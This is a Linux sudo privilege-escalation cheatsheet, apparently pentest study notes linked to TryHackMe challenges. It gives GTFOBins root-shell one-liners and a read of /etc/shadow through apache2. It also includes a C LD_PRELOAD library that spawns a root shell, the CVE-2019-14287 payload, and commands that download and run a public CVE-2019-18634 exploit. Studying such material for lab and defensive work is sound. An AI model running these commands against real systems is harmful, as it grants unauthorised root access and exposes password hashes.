Sudo
sudo -l
Enumeration
The command sudo
allows the current user to execute certain commands as other users. To view a list of such commands:
sudo -l
In the trivial case, the current user can execute any command as any user:

In this case we can spawn a root shell directly:
/bin/bash -p
Method 1: GTFOBins
For a privesc cheatsheet, check out GTFOBins:
Examples
If find
is in sudo -l
:
sudo find /bin -name nano -exec /bin/sh \;
If awk
is in sudo -l
:
sudo awk 'BEGIN {system("/bin/sh")}'
If nmap
is in sudo -l
:
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
If vim
is in sudo -l
:
sudo vim -c ':!/bin/sh'
Method 2: Intended Functionality
apache2
If apache2
is in sudo -l
, then we can read the root password hash from /etc/shadow
by triggering an error:
sudo apache2 -f /etc/shadow
wget
A wget
privesc example:
Method 3: LD_PRELOAD
LD_PRELOAD
is an environment variable that lists shared libraries with functions that override the standard set, just as /etc/ld.so.preload
does. These are implemented by the loader /lib/ld-linux.so
.
If sudo -l
finds LD_PRELOAD as well as some sudo command, for example, /usr/sbin/apache2
:
env_reset, env_keep+=LD_PRELOAD
...
(root) NOPASSWD: /usr/sbin/apache2
then we can utilize this "feature" for privilege escalation. Store the following C program in /tmp
:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init()
{
unsetenv("LD_PRELOAD"); // Unset env LD_PRELOAD
setgid(0); // Set GID to root
setuid(0); // Set UID to root
system("/bin/bash"); // Execute /bin/bash
}
Compile it:
gcc -fPIC -shared -o x.so x.c -nostartfiles
Trigger it with any sudo command (this command can be anything, here apache2
is just an example):
sudo LD_PRELOAD=/tmp/x.so /usr/sbin/apache2
Then we will get a root shell.
Method 4: Attacking Sudo Itself
CVE-2019-14287
If sudo -l
shows we can execute /bin/bash
as any user other than root:
(ALL, !root) /bin/bash
Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent: 4294967295), Sudo would incorrectly read this as being 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so.
That means we can get a root shell using the following payload:
sudo -u#-1 /bin/bash
Test this CVE in TryHackMe:
CVE-2019-18634
In /etc/sudoers
, there is an option named pwfeedback
, which is turned off by default. If it is turned on, Linux will give you "feedback" when you type password by showing a asterisk for each character you type.
In Sudo 1.8.25p, this pwfeedback
option leads to buffer overflow vulnerability if it is turned on. To exploit this vulnerability, download the C source code:
wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
Compile it:
gcc -o exploit exploit.c
Give permission and run it:
chmod +x exploit ; ./exploit
Test this CVE in TryHackMe:
Challenge: TryHackMe - Simple CTF
Last updated
Was this helpful?